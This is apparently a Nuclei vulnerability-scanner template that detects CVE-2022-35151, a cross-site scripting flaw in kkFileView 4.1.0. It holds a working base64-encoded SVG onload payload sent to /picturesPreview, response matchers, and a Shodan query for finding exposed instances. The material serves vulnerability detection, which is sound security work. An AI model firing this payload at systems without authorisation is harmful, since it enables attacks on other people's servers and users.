58 lines
2.0 KiB
YAML
58 lines
2.0 KiB
YAML
id: CVE-2022-35151
|
|
|
|
info:
|
|
name: kkFileView 4.1.0 - Cross-Site Scripting
|
|
author: arafatansari
|
|
severity: medium
|
|
description: |
|
|
kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the urls and currentUrl parameters at /controller/OnlinePreviewController.java.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement.
|
|
remediation: |
|
|
To mitigate this vulnerability, it is recommended to update kkFileView to the latest version or apply a patch provided by the vendor.
|
|
reference:
|
|
- https://github.com/kekingcn/kkFileView/issues/366
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-35151
|
|
- https://github.com/StarCrossPortal/scalpel
|
|
- https://github.com/anonymous364872/Rapier_Tool
|
|
- https://github.com/youcans896768/APIV_Tool
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-35151
|
|
cwe-id: CWE-79
|
|
epss-score: 0.02148
|
|
epss-percentile: 0.8906
|
|
cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: keking
|
|
product: kkfileview
|
|
shodan-query: http.html:"kkFileView"
|
|
tags: cve,cve2022,xss,kkfileview,keking
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT4%3D HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '<svg/onload=alert(document.domain)>'
|
|
- '图片预览'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100ea88299ec85fb50b4a362a8e064bc821fb7715a7759f1eeca4e1cf413f0660ed022100fe6573babba0d9c0edfa96f41ecf1d52e2520195df629fdc83d76427c3b9eef7:922c64590222798bb761d5b6d8e72950 |